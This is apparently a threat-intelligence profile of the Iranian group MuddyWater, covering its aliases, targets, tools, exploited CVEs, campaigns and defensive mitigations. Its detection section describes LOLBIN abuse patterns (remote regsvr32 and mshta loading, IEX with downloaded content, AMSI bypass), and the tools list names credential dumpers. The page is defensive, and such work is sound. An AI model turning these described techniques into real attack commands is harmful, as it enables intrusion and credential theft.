← All Threat Actors / MuddyWater
Last updated: April 02, 2026
M
MuddyWater
Iranian Ministry of Intelligence and Security (MOIS)
🇮🇷 IranNation-State● ActiveG0069
Key Intelligence
MITRE ID
G0069
Country
🇮🇷 Iran
Motivation
Espionage, Surveillance
Active Since
2017
Last Seen
2025
Techniques
23 across 11 tactics
Attribution
Iranian Ministry of Intelligence and Security (MOIS)
Also Known As
MERCURYMango SandstormStatic KittenSeedwormTEMP.ZagrosTA450Earth VetalaATK51Yellow Nix
Target Profile
Targeted Industries
GovernmentTelecommunicationsDefenseOil & GasMedia
Targeted Countries
🇹🇷 Turkey🇵🇰 Pakistan🇦🇪 UAE🇮🇱 Israel🇮🇶 Iraq🇸🇦 Saudi Arabia

Overview

MuddyWater is an Iranian state-sponsored group linked to MOIS conducting espionage operations primarily against Middle Eastern, Central Asian, and Western government and telecommunications organizations. Known for heavy use of legitimate tools like Atera, ScreenConnect, and SimpleHelp for remote access, making detection difficult. The group frequently uses living-off-the-land techniques and spearphishing with macro-enabled documents.

Tools & Malware

MuddyC2GoPhonyC2POWERSTATSPowGoopSmall SieveMuddyC3Atera AgentScreenConnectSimpleHelpScreenConnect (abused)LaZagneMimikatzAtera

Malware & Tool Details

Arsenal attributed to MuddyWater.

MuddyC2Go
Go-Based C2
Go-Based C2
PhonyC2
C2 Framework
C2 Framework
POWERSTATS
PowerShell Backdoor
PowerShell Backdoor
PowGoop
Malware / Tool
ATT&CK Software
Small Sieve
Malware / Tool
ATT&CK Software
MuddyC3
Malware / Tool
ATT&CK Software
Atera Agent
Malware / Tool
ATT&CK Software
ScreenConnect
RMM Tool (Abused)
RMM Tool (Abused)
SimpleHelp
RMM Tool (Abused)
RMM Tool (Abused)
ScreenConnect (abused)
Remote Management
Remote Management
LaZagne
Credential Recovery
Credential Recovery
Mimikatz
Credential Dumping
Credential Dumping

Attack Path POWERSTATS / RMM Tool Abuse (2022-2024)

Following MITRE ATT&CK Flow methodology.

ATTACK FLOWPOWERSTATS / RMM Tool Abuse (2022-2024)8 steps | Drag nodes to rearrange

Diamond Model

Caltagirone, Pendergast & Betz (2013) | Drag to rearrange
ADVERSARY
MOIS, overlaps with OilRig operators
CAPABILITY
POWERSTATS, MuddyC2Go, PhonyC2, PowGoop, Small Sieve, LaZagne, RMM tools
INFRASTRUCTURE
Legitimate RMM platforms (ScreenConnect, Atera, SimpleHelp), compromised webmail
VICTIM
Turkey, Pakistan, UAE, Iraq, Israel, Saudi Arabia — gov, telecom, defense, oil & gas

ATT&CK Navigator

Interactive MITRE ATT&CK Navigator layer for MuddyWater (G0069).

Open Full Navigator

Known CVEs Exploited

CVEYearDescription
CVE-2021-442282021Log4Shell for access against Israeli targets
CVE-2021-268552021ProxyLogon for Exchange web shells

Notable Campaigns

2024
SimpleHelp Abuse
Large-scale abuse of legitimate remote management tools for persistent access.
2022
PhonyC2 Deployment
Development and deployment of custom C2 framework replacing older tools.
2021
Log4j Exploitation
Rapid adoption of Log4j vulnerabilities for initial access against Israeli targets.
2018
POWERSTATS Campaign
Targeting of government organizations in the Middle East with custom PowerShell backdoor.

Detection Engineering

RMM Tool Abuse Detection
Maintain an inventory of approved RMM tools. Alert on installation of ScreenConnect, Atera, SimpleHelp, AnyDesk, or TeamViewer if not approved for that endpoint. Monitor for RMM agent communication to unexpected tenant IDs or account identifiers.
View Detection Rule / Guide
LOLBIN Execution Monitoring
Monitor mshta.exe executing remote HTA files from URLs. Detect regsvr32.exe loading remote SCT files via /s /u /i:URL patterns. Alert on rundll32.exe with unusual command-line arguments. Enable Windows ASR rules for LOLBIN restriction.
View Detection Rule / Guide
PowerShell Obfuscation Detection
Enable Script Block Logging (Event ID 4104). Detect Base64-encoded commands, string concatenation obfuscation (-join, [char] casting), and Invoke-Expression (IEX) with downloaded content. Monitor for AMSI bypass attempts.
View Detection Rule / Guide

Related Threat Actors

Documented in MITRE ATT&CK, vendor intelligence, and government advisories.

OilRig
MOIS co-operator
OilRig uses DNS; MuddyWater uses RMM/LOLBIN abuse.
Charming Kitten
Iranian co-operator
IRGC-linked, overlapping victim sets.

Defense Recommendations

Mitigations with MITRE ATT&CK IDs. Click badges for implementation guidance.

Block unauthorized RMM tools (ScreenConnect, Atera, SimpleHelp). MuddyWater uses legitimate RMM for persistence.
CISA AA22-055A
Deploy ASR rules blocking LOLBIN abuse (mshta.exe, regsvr32.exe, rundll32.exe).
Microsoft ASR
Enable PowerShell CLM and Script Block Logging. MuddyWater uses obfuscated PowerShell heavily.
NSA/CISA PowerShell Guide
Block macros from internet via MOTW enforcement.
Microsoft Macro Policy

Attribution Confidence

High
Attribution
Confidence
Evidence Supporting Attribution
US Cyber Command attributes to Iranian MOIS
https://www.cybercom.mil/Media/News/Article/2897570/iranian-
Multiple vendor attributions (Cisco Talos, Trend Micro)
https://blog.talosintelligence.com/2022/01/iranian-apt-muddy

Threat Assessment

Capability6/10
Intent8/10
Targeting7/10
Moderate
Overall Threat Level
Iranian MOIS-affiliated actor notable for abusing legitimate RMM tools and living-off-the-land techniques. Broad Middle East targeting.

Legal Actions & Sanctions

2022-01
US Cyber Command attributes MuddyWater to Iranian MOIS
Attribution
https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/

Recent Reporting

2024-01

Emulation Plans & Guidance

PlanSourceTypeDescriptionLink
CISA AA22-055A MuddyWater AdvisoryCISAGuideIranian MOIS advisory with MuddyWater TTPs and detection guidanceOpen
Deep Instinct MuddyC2Go AnalysisDeep InstinctGuideTechnical analysis of MuddyC2Go frameworkOpen
Deep Instinct: PhonyC2 FrameworkDeep InstinctGuideTechnical analysis of PhonyC2 C2 framework with detection and emulation guidanceOpen

References & Intelligence Sources

Page Contributors

Adversary Village
MITRE ATT&CK Team
BreachSimRange